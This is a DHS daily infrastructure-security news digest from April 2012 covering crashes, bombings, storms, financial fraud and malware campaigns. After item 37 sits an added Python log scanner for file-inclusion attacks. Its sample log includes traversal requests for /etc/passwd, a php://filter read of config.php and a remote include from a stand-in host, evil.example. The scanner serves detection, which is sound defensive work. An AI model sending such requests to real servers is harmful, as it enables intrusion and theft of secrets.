Wednesday, April 4, 2012

Complete DHS Daily Report for April 4, 2012

Daily Report

Top Stories

• The Royal Bank of Canada was sued by U.S. regulators April 2, over claims that the Toronto, Canada-based lender engaged in illegal futures trades worth hundreds of millions of dollars to garner tax benefits. – Bloomberg. See item 9 below in the Banking and Finance Sector

• Officials in Volusia County, Florida, said a single-engine plane crashed into a supermarket April 2, injuring five people, including three shoppers inside the store during the crash. – WESH 2 Orlando

18. April 3, WESH 2 Orlando – (Florida) 5 hurt when plane crashes into DeLand Publix. Police and sheriff’s officials in Volusia County, Florida, said a single-engine plane crashed into a Publix in DeLand April 2. The crash occurred at the Northgate Shopping Center, a half-mile from the DeLand Municipal Airport. DeLand fire officials said five people were injured, including three shoppers and the two people on board the plane. Two shoppers were taken to the hospital and were expected to be released April 2. The third shopper suffered burns and was taken to a different hospital, where he was listed in stable condition. The pilot and passenger on board the plane also suffered burns and were taken to the hospital. The pilot of a medical transport helicopter used at the scene said the plane was an amphibious experimental aircraft that took off from DeLand and suffered engine failure. Witnesses at the scene described seeing the plane sputter, hit the building, and burst into flames. The plane crashed in the back of the store, near the meat department, but those up front said they could still feel the heat from the fire. The National Transportation Safety Board and the Federal Aviation Administration were notified about the crash. Source:

• A former Oikos University student accused of killing seven people at the university in Oakland, California, “does not appear to be remorseful at all,” the city’s police chief said April 3. – CNN

26. April 2, CNN – (Wisconsin) Homemade bomb causes fire outside Planned Parenthood clinic. A Planned Parenthood clinic in Wisconsin was closed after a homemade bomb was placed outside the building April 1, the state organization said. The explosive device caused a small fire by the time Grand Chute fire officials arrived, the president and CEO of Planned Parenthood of Wisconsin said in a statement. No patients or staff members were at the health care center at the time. Police in Grand Chute are investigating the incident. Source:

• Students, public officials, and shoppers in Arlington, Texas, took cover April 3 as a large tornado touched ground, part of a huge complex of storms that was wreaking havoc across North Texas. The storms caused severe damage and delayed flights. – Fort Worth Star-Telegram

40. April 3, Fort Worth Star-Telegram – (Texas) Students, public officials, shoppers take cover as tornado touches down in Arlington. Students, public officials, and shoppers in Arlington, Texas, were taking cover April 3 as a large tornado touched ground, part of a huge complex of storms that was wreaking havoc across North Texas. The Parks at Arlington mall was shut down and management ordered shoppers and others into the basement. Employees at Cowboys Stadium were moved into the tunnels. Damage was also reported at nearby apartments. The Arlington Fire Department reported heavy damage near Lake Arlington and damage to the Green Oaks Nursing Home. Dallas/Fort Worth Airport told passengers to move away from glass windows and to take cover in its storm shelters. The Federal Aviation Administration also issued a ground stop for flights coming in and out of the airport. The first tornado was spotted near Joshua, causing damage according to a county sheriff’s department officer. Students in Burleson and Arlington were moved to safety zones. The National Weather Service said a tornado touched down in Kennedale, and media reported “extreme damage.” A funnel touched down about 2 miles east of Spinks Airport in south Tarrant County without causing damage, according to the airport manager. A second tornado warning was issued for Dallas and Ellis counties after a tornado was confirmed on the ground in Ellis County. A tornado near Lancaster in Dallas County reportedly caused power flashes and sent debris flying. Source:

• Dougherty County police found five explosive devices in a man’s car near the Georgia Power Dam in Albany, Georgia, April 1. – WALB 10 Albany (See item 47)

47. April 2, WALB 10 Albany – (Georgia) Georgia Dam explosive device suspect released on bond. A man caught with explosives near the Georgia Power Dam in Albany, Georgia, April 1, was released on bond the following day. The man was arrested after police got a tip that someone had explosives near the dam. Dougherty County Police found five explosive devices in the man’s car. The Dougherty County police captain said, “Right now we don’t have anything to indicate that he is some kind of terrorist, but we really don’t know for sure, and that’s why we are continuing to look into him and his background.” Samples of the explosive device and the chemicals used were sent to the FBI while the rest were destroyed by the Georgia Bureau of Investigation. Source:


Banking and Finance Sector

9. April 3, Bloomberg – (National; International) RBC sued by U.S. regulators over wash trades. Royal Bank of Canada (RBC) was sued April 2 by U.S. regulators over claims that the Toronto, Canada-based lender engaged in illegal futures trades worth hundreds of millions of dollars to garner tax benefits tied to equities. Canada’s biggest bank made false and misleading statements about “wash trades” from 2007 to 2010 in which affiliates traded among themselves in a way that undermined competition and price discovery on the OneChicago LLC exchange, the Commodity Futures Trading Commission (CFTC) said in a complaint filed in a New York federal court. Royal Bank enlisted affiliates to help carry out hundreds of futures transactions that were done off-exchange and then reported to OneChicago as block trades between independent affiliates, according to the CFTC. The trades, which resulted in Royal Bank not having a financial position in a market, were conducted for Canadian tax benefits tied to holding certain stocks, the CFTC said. The transactions, involving single-stock futures and narrow-based indexes, were used to hedge the risk of holding the equities, according to the statement. Between 2006 and 2010, the narrow-based index trades between a Toronto-based bank account and RBC Europe Ltd., a London-based bank subsidiary, represented all of the narrow-based index volume on OneChicago, the CFTC said in the complaint. Senior members of the bank’s central funding group determined the prices and contracts traded. From 2005 to 2010, RBC concealed material information and made false statements about the trades to CME Group Inc., which had regulatory oversight of the exchange, according to the CFTC. RBC’s responses to CME questions about the trades “concealed information concerning the central role” of the central funding group and the bank’s single-stock futures trades, CFTC said. The CFTC is seeking monetary penalties and an injunction against further violations, the agency said. Source:

10. April 3, Help Net Security – (International) Fake US Airways emails lead to Zeus variant. A US Airways-themed spam campaign aiming at infecting users with a variant of the Zeus banking trojan has been hitting inboxes for the last 2 weeks, according to a Kaspersky Lab researcher. This particular spam e-mail purportedly contains the confirmation code and the online reservation details needed for the users to confirm their flight reservation. However, the offered links take users to one of a number of compromised domains containing malicious javascripts that perform a number of redirections and finally land the victims on a domain hosting the BlackHole exploit kit. Once the kit exploits a vulnerability in Java, Flash Player, or Adobe Reader, a downloader that ultimately connects to a command and control server and downloads and runs the GameOver Zeus variant is installed on the machine. “At all the stages of this attack, every object — domains, links to javascripts, files with exploits, the downloader and Zeus — was frequently replaced with a new one,” the researcher said. “The domains remained ‘alive’ for nearly 12 hours, while the Zeus samples were replaced more often.” Given that the exploits, downloaders, and Zeus modifications used by the cybercriminals in this attack were detected mostly by Russian, U.S., Italian, German, and Indian Kaspersky users, the researcher speculates the spam campaign is not the only method used by these cyber crooks to spread Zeus. Source:

11. April 2, Citybizlist Baltimore – (Maryland) Maryland attorney pleads guilty in $14M construction investment scheme. An attorney pleaded guilty April 2 in Maryland to conspiring to commit wire fraud arising from an investment fraud scheme. According to his plea agreement, the attorney and his co-conspirators targeted individuals seeking investment opportunities or commercial real estate development lending in Maryland and elsewhere, including a Bowie, Maryland hotel project. Victim investors were instructed that in order to obtain loans for commercial real estate projects, they were required to deposit large sums of money in an escrow bank account to show “liquidity.” All of the escrow agreements used to defraud the investors provided that no person other than the victims had the ability to remove the escrowed funds without permission. From at least August 2009 to August 2011, the attorney and his co-conspirators defrauded investors by removing the funds. Typically, within 1 or 2 weeks after the deposit, they withdrew the victim’s funds to pay their business and personal debts or to make “lulling” payments to other investors. They attempted to cover up the fraud by issuing false verifications of deposits and false bank statements regarding the amount of escrowed funds; falsely representing in e-mails and by phone the balance of escrow funds and the date when the investors’ money would be returned; and returning part of the victims’ investments using funds from other investors. They improperly obtained funds from investor victims in excess of $14 million. Source: Guilty-in-14M-Construction-Investment-Scheme.aspx

12. April 2, KLEW 3 Lewiston – (Idaho) Nearly 300 people fall victim to credit card fraud. Nearly 300 people in and around the Orofino, Idaho area have fallen victim to credit card fraud since the first week of February, KLEW 3 Lewiston reported April 2. According to the Orofino police chief, the victims have reported fraudulent usage, or attempted usage, of their credit card accounts with unauthorized purchase attempts. The Orofino Police Department has been working with a number of banking institutions and the U.S. Secret Service to determine the source of fraud. Together, the three departments determined Orofino’s Glenwood IGA was the common point of purchase for the compromised accounts. The police chief said IGA has been fully cooperating with law enforcement to determine the compromise. Source:

13. April 2, U.S. Department of Justice – (New Hampshire; Massachusetts) New Hampshire and Massachusetts residents convicted for promoting and using tax defier schemes. A federal jury in Worcester, Massachusetts, convicted three defendants for conspiracies to defraud the United States through the promotion and use of multiple tax fraud schemes, the Justice Department and the Internal Revenue Service (IRS) announced April 2. According to the evidence presented at trial, the three promoted a payroll scheme to employers and individuals who wanted to avoid payment of employer payroll taxes and individual payroll taxes. Approximately 150 individuals subscribed to the payroll scheme and in excess of $2.5 million in unreported wages and compensation were paid through the system. The evidence at trial also proved two of the defendants conspired to defraud the United States by promoting and operating an “underground warehouse banking” scheme which helped subscribers conceal income and assets from the IRS. As part of the banking scheme, the defendants maintained accounts at several banks and used the accounts to deposit and commingle business receipts and other funds received from subscribers in order to mask the true ownership of the funds. According to evidence presented at trial, more than $28 million in deposits were made into the various bank accounts used in the scheme. Source:

14. April 2, KIVI 6 Boise – (Idaho) Boise transient arrested for making fake money in Boise hotel room. Police in Boise, Idaho, were called April 1 by the clerk of a motel. Motel employees told officers they were concerned about the welfare of a guest who missed the checkout time and appeared unresponsive when a motel employee entered to check the room. Boise Police knocked and announced themselves, and a man answered the door. Inside the room, officers saw in plain sight a printer and a trash can with what looked like paper copies of money. Also, the motel clerk previously told officers they were holding what appeared to be a fake $5 bill the man used to pay for the room. Detectives with the Boise Police Financial Crimes unit and the U.S. Secret Service were called to the scene. The motel guest was found to be using the room and printer to manufacture counterfeit U.S. currency. It appeared to officers the suspect was making the counterfeit bills, mainly in the denominations of $5 and $20, for the last 2 to 3 days. Officers also found the fake bills were recently passed at two nearby convenience stores by the suspect. The suspect was booked on the charge of forgery. Source:

Information Technology

34. April 3, IDG News Service – (International) Mozilla adds vulnerable Java plug-in versions to Firefox blocklist. Mozilla blacklisted unpatched versions of the Java plug-in from Firefox on Windows in order to protect its users from attacks that exploit known vulnerabilities in those versions. Mozilla can add extensions or plug-ins to the Firefox add-on blocklist if they cause significant security or performance issues. Firefox installations automatically query the blocklist and notify users before disabling the targeted add-ons. “The February 2012 update to the Java Development Kit (JDK) and Java Runtime Environment (JRE) included a patch to correct a critical vulnerability that can permit the loading of arbitrary code on an end-user’s computer,” Mozilla’s channel manager said April 2. “This vulnerability — present in the older versions of the JDK and JRE — is actively being exploited, and is a potential risk to users,” he said. “To mitigate this risk, we have added affected versions of the Java plugin for Windows (Version 6 Update 30 and below as well as Version 7 Update 2 and below) to Firefox’s blocklist.” He did not specify the vulnerability being actively exploited, but security companies have warned during the past several weeks that exploits for the CVE-2010-0507 Java vulnerability were being used in widespread attacks and have been incorporated into the popular Blackhole exploit toolkit. Source:

35. April 3, IDG News Service – (International) Adobe releases open source malware classification tool. Adobe Systems released a malware classification tool in order to help security incident first responders, malware analysts, and security researchers more easily identify malicious binary files. The Adobe Malware Classifier tool uses machine learning algorithms to classify Windows executable and dynamic link library files as clean, malicious, or unknown, an Adobe security engineer said. When run, the tool extracts seven key attributes from every analyzed binary file and compares them to data obtained by running the J48, J48 Graft, PART, and Ridor machine-learning algorithms on a set of 100,000 malicious programs and 16,000 clean ones, he said. Source:

36. April 3, The Register – (International) Facebook logins easily slurped from iOS, Android kit. Facebook’s iOS and Android clients do not encrypt users’ logon credentials, leaving them in a folder accessible to other apps or USB connections. A rogue application, or 2 minutes with a USB connection, is all that is needed to steal the temporary credentials from either device. In the case of iOS, someone can even take the data from a backup, enabling the hacker to attach to a Facebook account and access applications. This exploit comes from a reader of The Register, who came across the file and tested it to see if it was easy enough to pretend to be someone else. After developing a proof-of-concept, which lifted “several thousand” IDs, the reader deleted the collected data and reported the matter to Facebook. It appears Facebook is already aware of the problem and working on a fix — though it will not say how long it is going to take or what users should do in the meantime. Source:

37. April 2, – (International) Anonymous and LulzSec hackers evolving to target corporate data to cause financial pain. Hacker groups Anonymous and LulzSec are changing tactics to target firms’ corporate data in order to hurt them financially, rather than cause embarrassment by affecting Web sites, according to new research from security firm Imperva. In its latest Hacker Intelligence Initiative report, Imperva researchers said they saw a marked change in hacktivists’ behavior, with groups moving away from defacing Web sites or knocking them offline to stealing data. Specifically, Imperva researchers reported discovering that 21 percent of all recorded incidents from June to November 2011 saw hackers mounting local and remote file inclusion (RFI/LFI) attacks. The statistic was widely attributed to hacktivists, such as the Anonymous collective and LulzSec group. A form of attack that targets PHP coding, the use of RFI/LFI techniques allows hackers to steal data by manipulating the company’s Web server, and indicates a step away from their usual tendency to target companies’ Web sites with distributed denial-of-service assaults. Source:
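As an added example (not part of the DHS report or the Imperva research it cites), a small Python scanner that flags the request patterns characteristic of the RFI/LFI attacks described in item 37 in web server access logs, so a defender can triage them; the log lines, addresses and hostnames below are constructed for the example.

```python
import re
from urllib.parse import parse_qsl, unquote, urlsplit

# Constructed sample access-log lines (common log format); not real traffic.
SAMPLE_LOG = """\
203.0.113.5 - - [02/Apr/2012:10:01:12 +0000] "GET /index.php?page=about HTTP/1.1" 200 512
203.0.113.7 - - [02/Apr/2012:10:01:13 +0000] "GET /index.php?page=../../../../etc/passwd HTTP/1.1" 200 1043
203.0.113.9 - - [02/Apr/2012:10:01:14 +0000] "GET /index.php?page=%2e%2e%2f%2e%2e%2fetc%2fpasswd%00 HTTP/1.1" 200 1043
198.51.100.2 - - [02/Apr/2012:10:01:15 +0000] "GET /view.php?tpl=http://evil.example/shell.txt HTTP/1.1" 200 88
198.51.100.3 - - [02/Apr/2012:10:01:16 +0000] "GET /view.php?tpl=php://filter/convert.base64-encode/resource=config.php HTTP/1.1" 200 2200
198.51.100.4 - - [02/Apr/2012:10:01:17 +0000] "GET /view.php?tpl=news&id=42 HTTP/1.1" 200 300
"""

# Client IP, method and request target from a common-log-format line.
REQUEST_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>\S+) (?P<target>\S+) [^"]*"')
# Remote inclusion: a parameter value that is itself a URL to fetch.
REMOTE_RE = re.compile(r'^(?:https?|ftps?)://', re.I)
# PHP stream wrappers commonly abused to read local source or execute input.
WRAPPER_RE = re.compile(r'^(?:php|phar|zip|expect|glob)://|^data:', re.I)
# Directory traversal, either slash style.
TRAVERSAL_RE = re.compile(r'\.\./|\.\.\\')


def classify_value(value):
    """Return a finding category for one query-parameter value, or None."""
    # Decode twice so double-encoded payloads (e.g. %252e) are caught;
    # parse_qsl has already removed one layer for values taken from a log.
    decoded = unquote(unquote(value))
    if REMOTE_RE.match(decoded):
        return "rfi-remote-url"
    if WRAPPER_RE.match(decoded):
        return "lfi-wrapper"
    if TRAVERSAL_RE.search(decoded):
        return "lfi-traversal"
    if "\x00" in decoded:           # null-byte truncation of an appended suffix
        return "lfi-null-byte"
    return None


def scan_log(text):
    """Scan access-log text; return one finding per suspicious parameter."""
    findings = []
    for lineno, line in enumerate(text.splitlines(), 1):
        m = REQUEST_RE.match(line)
        if not m:
            continue
        query = urlsplit(m.group("target")).query
        for name, raw in parse_qsl(query, keep_blank_values=True):
            category = classify_value(raw)
            if category:
                findings.append({"line": lineno, "ip": m.group("ip"),
                                 "param": name, "category": category})
    return findings


if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG):
        print(f"line {f['line']}: {f['ip']} param={f['param']} -> {f['category']}")
```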

38. April 2, SecurityWeek – (International) Dozens of Alexa top 25,000 domains serving malware to millions, firm says. An analysis of the Alexa top 25,000 most popular domains revealed 58 were serving malicious content during the month of February — translating to more than 10.5 million users being targeted by malware, according to research by Barracuda Networks. The firm also found that on average, 2 of the Alexa top 25,000 domains serve malicious content each day. In addition, Alexa top-ranked domains served malicious content 23 of the 29 days in February, underscoring that the problem is persistent, Barracuda Networks argued. Almost all of the sites hitting visitors with malicious content were a year or more old, and more than half of the sites were older than 5 years. That means attackers were specifically utilizing well-established, long-lived sites for their drive-by download operations. Source:

For another story, see item 10 above in the Banking and Finance Sector

Communications Sector

39. April 2, WMBD 31 Peoria – (Illinois) Cell tower outage has Bradley students searching for connection. Sprint customers on Bradley University’s campus in Peoria, Illinois, were having trouble making phone calls April 2. A cell tower outage in Peoria was causing Sprint customers to lose service. A Bradley spokesperson said the problem started the week of March 26. He said Sprint told him the problem is affecting various areas across central Illinois. A Bradley spokesperson said that Sprint has told him the tower would be fixed April 6. Source: